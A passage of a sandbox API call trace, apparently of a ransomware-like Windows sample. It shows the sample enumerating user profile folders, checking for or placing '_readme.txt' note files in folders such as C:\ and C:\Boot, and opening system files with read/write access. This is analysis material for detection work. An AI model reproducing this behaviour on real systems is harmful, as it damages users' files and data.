[0128.116] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0128.116] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0128.116] PathFindFileNameW (pszPath="") returned="" [0128.117] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.117] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0128.117] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0128.117] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0128.117] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0128.117] PathFindFileNameW (pszPath="") returned="" [0128.117] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.117] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="Links\\" [0128.118] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0128.118] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0128.118] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0128.118] PathFindFileNameW (pszPath="") returned="" [0128.118] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.118] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\") returned="Local Settings\\" [0128.118] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0128.118] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0128.118] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0128.118] PathFindFileNameW (pszPath="") returned="" [0128.118] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.119] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0128.119] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0128.119] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0128.119] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0128.119] PathFindFileNameW (pszPath="") returned="" [0128.119] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.119] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\") returned="My Documents\\" [0128.119] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0128.119] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0128.119] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0128.119] PathFindFileNameW (pszPath="") returned="" [0128.120] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.120] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\") returned="NetHood\\" [0128.120] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0128.120] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0128.120] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0128.120] PathFindFileNameW (pszPath="") returned="" [0128.120] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.120] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0128.120] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0128.120] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0128.120] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0128.120] PathFindFileNameW (pszPath="") returned="" [0128.121] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.121] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\") returned="PrintHood\\" [0128.121] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0128.121] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0128.121] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0128.121] PathFindFileNameW (pszPath="") returned="" [0128.121] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.121] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\") returned="Recent\\" [0128.121] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0128.121] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0128.121] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0128.122] PathFindFileNameW (pszPath="") returned="" [0128.122] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.122] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\") returned="Saved Games\\" [0128.122] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0128.122] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0128.122] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0128.122] PathFindFileNameW (pszPath="") returned="" [0128.122] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.123] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned="Searches\\" [0128.123] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0128.123] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0128.123] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0128.123] PathFindFileNameW (pszPath="") returned="" [0128.123] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.123] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\") returned="SendTo\\" [0128.123] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0128.123] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0128.123] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0128.123] PathFindFileNameW (pszPath="") returned="" [0128.124] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.124] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\") returned="Start Menu\\" [0128.124] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0128.124] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0128.124] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0128.124] PathFindFileNameW (pszPath="") returned="" [0128.124] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.124] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\") returned="Templates\\" [0128.124] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0128.124] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0128.124] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0128.124] PathFindFileNameW (pszPath="") returned="" [0128.124] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.125] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0128.125] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0128.125] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0128.125] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0128.125] PathFindFileNameW (pszPath="") returned="" [0128.125] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.125] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.125] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0128.125] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0128.125] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0128.125] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0128.126] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0128.126] PathFindFileNameW (pszPath="") returned="" [0128.126] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.126] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.126] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\") returned="_BvYf_mP_z7pO60\\" [0128.126] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0128.126] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0128.126] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0128.126] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0128.126] PathFindFileNameW (pszPath="") returned="" [0128.126] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.127] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\") returned="aFM0SjkBF-UdBxYLzMZ\\" [0128.127] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0128.127] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0128.127] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0128.127] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0128.127] PathFindFileNameW (pszPath="") returned="" [0128.127] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.127] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\") returned="My Music\\" [0128.127] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0128.127] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0128.127] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0128.127] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0128.127] PathFindFileNameW (pszPath="") returned="" [0128.128] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.128] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\") returned="My Pictures\\" [0128.128] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0128.128] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0128.128] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0128.128] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0128.128] PathFindFileNameW (pszPath="") returned="" [0128.129] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.129] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="My Shapes\\" [0128.129] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0128.129] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0128.129] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0128.129] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0128.129] PathFindFileNameW (pszPath="") returned="" [0128.131] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.131] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\") returned="My Videos\\" [0128.131] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0128.131] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0128.131] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0128.131] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0128.131] PathFindFileNameW (pszPath="") returned="" [0128.131] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.131] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned="Outlook Files\\" [0128.132] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0128.132] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0128.132] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0128.132] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0128.132] PathFindFileNameW (pszPath="") returned="" [0128.132] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.132] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tlPIR\\") returned="tlPIR\\" [0128.133] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0128.133] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0128.133] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0128.133] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0128.133] PathFindFileNameW (pszPath="") returned="" [0128.133] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.133] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="Links\\" [0128.133] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0128.133] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0128.133] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0128.133] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0128.133] PathFindFileNameW (pszPath="") returned="" [0128.134] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.134] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="Microsoft Websites\\" [0128.134] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0128.134] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0128.134] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0128.134] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0128.134] PathFindFileNameW (pszPath="") returned="" [0128.137] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.137] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="MSN Websites\\" [0128.137] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0128.138] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0128.138] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0128.138] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0128.138] PathFindFileNameW (pszPath="") returned="" [0128.140] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.141] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="Windows Live\\" [0128.141] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0128.141] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0128.141] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0128.141] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0128.141] PathFindFileNameW (pszPath="") returned="" [0128.144] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.144] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\") returned="H9ZDOLsEHsUNLx\\" [0128.144] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0128.144] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0128.144] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0128.144] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0128.144] PathFindFileNameW (pszPath="") returned="" [0128.144] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.144] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\94ItO\\") returned="94ItO\\" [0128.144] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0128.144] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0128.145] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0128.145] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0128.145] PathFindFileNameW (pszPath="") returned="" [0128.145] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.145] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\") returned="SqYhvBjGVsjCxavcn\\" [0128.145] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0128.145] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0128.145] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0128.145] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0128.145] PathFindFileNameW (pszPath="") returned="" [0128.146] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.146] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\") returned="aQuqK8QzpcTyT\\" [0128.146] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0128.146] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0128.146] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0128.146] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0128.146] PathFindFileNameW (pszPath="") returned="" [0128.146] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.146] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0128.146] PathFindFileNameW (pszPath="") returned="" [0128.146] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0128.147] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0128.147] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x7516fe8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0128.147] PathAppendW (in: pszPath="C:\\", pMore="_readme.txt" | out: pszPath="C:\\_readme.txt") returned 1 [0128.147] PathFileExistsW (pszPath="C:\\_readme.txt") returned 1 [0128.148] PathFindExtensionW (pszPath="C:\\bootmgr") returned="" [0128.148] PathFindExtensionW (pszPath="C:\\BOOTSECT.BAK") returned=".BAK" [0128.148] CreateFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0128.149] PathFindExtensionW (pszPath="C:\\hiberfil.sys") returned=".sys" [0128.149] PathFindExtensionW (pszPath="C:\\pagefile.sys") returned=".sys" [0128.149] PathFindExtensionW (pszPath="C:\\_readme.txt") returned=".txt" [0128.149] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.149] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0128.149] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.150] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0128.150] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9e58 | out: hHeap=0x4970000) returned 1 [0128.150] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0128.150] PathFindFileNameW (pszPath="") returned="" [0128.150] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9e58 [0128.150] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0128.150] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0128.150] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x800) returned 0x7516fe8 [0128.150] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x7516fe8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0128.150] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x810) returned 0xdcd2b08 [0128.150] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9318 [0128.150] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.150] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9e58 | out: hHeap=0x4970000) returned 1 [0128.150] FreeLibrary (hLibModule=0x759d0000) returned 1 [0128.151] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9318 | out: hHeap=0x4970000) returned 1 [0128.151] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.151] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9318 [0128.151] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x810) returned 0xdcd2b08 [0128.151] PathAppendW (in: pszPath="C:\\Boot\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\_readme.txt") returned 1 [0128.151] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.151] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9318 | out: hHeap=0x4970000) returned 1 [0128.151] PathFileExistsW (pszPath="C:\\Boot\\_readme.txt") returned 1 [0128.151] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.151] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9318 [0128.151] FindFirstFileW (in: 